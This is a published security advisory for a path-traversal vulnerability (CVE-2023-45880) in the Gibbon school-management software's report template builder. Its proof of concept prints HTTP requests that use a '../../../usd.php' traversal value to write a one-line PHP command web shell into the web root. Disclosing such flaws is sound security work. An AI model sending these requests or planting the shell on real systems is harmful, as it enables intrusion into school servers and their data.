usd-2023-0022 | Path-Traversal
Advisory ID: usd-2023-0022
Product: Gibbon (https://gibbonedu.org/)
Affected Version: 25.0.00
Vulnerability Type: CWE-23: Path-Traversal
Security Risk: Critical
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-45880
Desciption
Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.
The application allows high priviliged users to create report templates.
The report template builder is vulnerable to a Path Traversal vulnerability.
The "uploads" directory is not accessible by default, however it is possible to write files directly in the web root.
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.
Proof of Concept
In the first step, we need to duplicate one of the existing assets. This can be done on the Home > Reports > Template Builder > Manage Assets page.
The original request that is triggered is shown below:
POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1 Host: localhost:8080 [...] ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="address" /modules/Reports/templates_assets_components_duplicate.php ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="gibbonReportPrototypeSectionID" 0000000025 ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="templateFileDestination" footers/pageNumber.twig.html ------WebKitFormBoundaryGDOtYymhe5cRMATP--
The templateFileDestination parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to php.
POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1 Host: localhost:8080 [...] ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="address" /modules/Reports/templates_assets_components_duplicate.php ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="gibbonReportPrototypeSectionID" 0000000025 ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="templateFileDestination" ../../../usd.php ------WebKitFormBoundaryGDOtYymhe5cRMATP--
The file can be created from within the web application. You can insert PHP code and receive remote code execution.
This will result in the following request to be triggered
POST /modules/Reports/templates_assets_components_editProcess.php HTTP/1.1 Host: localhost:8080 [...] ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="address" /modules/Reports/templates_assets_components_edit.php ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="gibbonReportPrototypeSectionID" 0000000028 ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="name" Page Number ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="templateFile" ../../../usd.php ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="templateContent" <?php echo system($_GET['cmd']);?> ------WebKitFormBoundaryfnqLMucCLAXR1frS--
It should be noted, that the frontend will return an error that the request "failed due to a database error". However, the file is still created and populated with the payload.
The following screenshot shows, that the file was successfully created and populated with the payload.
This vulnerability can be chained with others, resulting in an exploit path that we demonstrated in this video:
Fix
It is recommended to prevent passing user-supplied input to filesystem operations.
If this is required, escape user input before processing it. Use a whitelist approach to only allow valid input.
References
Timeline
- 2023-07-11: Vulnerability identified by Christian Poeschl
- 2023-09-19: Security Release v25.0.01
- 2023-11-02: Advisory published
Credits
This security vulnerability was identified by Christian Poeschl of usd AG.